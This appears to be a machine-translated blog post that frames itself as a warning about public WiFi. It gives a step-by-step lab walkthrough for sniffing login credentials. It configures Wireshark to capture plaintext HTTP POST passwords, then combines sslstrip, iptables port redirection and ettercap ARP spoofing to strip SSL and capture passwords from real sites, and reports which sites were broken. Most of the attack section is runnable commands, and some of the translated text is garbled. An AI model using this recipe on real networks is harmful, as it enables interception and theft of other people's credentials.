Shulou(Shulou.com)06/01 Report--

Because I wrote a paragraph of text, there was this bag grabbing experiment.

--------------------------------

He said: "Now when we get somewhere, the first thing we do is ask if there is WiFi." WiFi has become popular nowadays, and people like free WiFi most in public places. But after using it, I didn't realize QQ was stolen. This WiFi is bait. The angler set up a trap. We thought we had picked up a bargain, but we didn't know that we were hooked. QQ stolen, mailbox was browsed and so on. Free is good, but be careful.

---------------------------------------

1. Test 51cto account and password with wireshark

Environmental construction

Network environment: Gateway: 192.168.199.1;

Test host: 192.168.199.101, ubuntu13.04/wireshark;

Test target: 51cto.com

step

a.ubuntu 13.04 install wireshark

sudo apt-get wireshark

b. Create a Wireshark group and add regular users to it, giving Wireshark access.

sudo groupadd wireshark //add group wireshark

sudo gpasswd -a zozlin wireshark //Add user USER to group GROUP

The requested URL/bin/dumpcap /was not found on this server.

sudo chmod 4755 /usr/bin/dumpcap //executable permissions

Error:

Solution: sudo gedit /usr/share/wireshark/init.lua

The penultimate line was originally: dofile(DATA_DIR.. "console.lua") changed to--dofile(DATA_DIR.. "console.lua")

c. sudo wireshark selection network card (tested locally)

fixed filter rule

ip.src==192.168.199.100 && http (source address and http protocol)

Focus (post application/x-www-form-urllencoded)

First try Tianya forum and 163 mail password, ssl has been encrypted transmission. After 51cto found is a plaintext account password

-----------------------------------------

2. Using ssl strip and ettercap to break ssl sniffing password

Environmental construction

Network environment: Gateway: 192.168.199.1;

*** Host: 192.168.199.101, ubuntu13.04/wireshark/sslstrip;

*** Host: 192.168.199.105/103, virtual machine Windows XP, IE6;

Test target: mail.163.com baidu.com tianya.cn

step

download

http://www.thoughtcrime.org/software/sslstrip/

decompression

tar -zxvf sslstrip-0.9.tar.gz

installation

sslstrip python setup.py install

Open ip_forword forwarding

echo "1">/proc/sys/net/ipv4/ip_forward

Filter packets using Iptables//import all http data to port 10000 via iptables. We use sslstrip to listen on port 10000 and get the data we want

iptables -t nat -A PREROUTING -p tcp -destination-port 80 -j REDIRECT -to-port 10000

sslstrip -l 10000

Arp spoofing using ettercap

ettercap -T -q -M arp:remote /192.168.199.103/ /192.168.199.1/

results

mail.163.com 51cto.com broken

baidu.com Password encrypted again

tianya.cn Unbroken

Reference 1.http://www.freebuf.com/articles/web/5929.html

2.http://www.blogjava.net/heyang/archive/2011/04/05/340330.html

3.http://www.linuxde.net/2011/11/2522.html

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.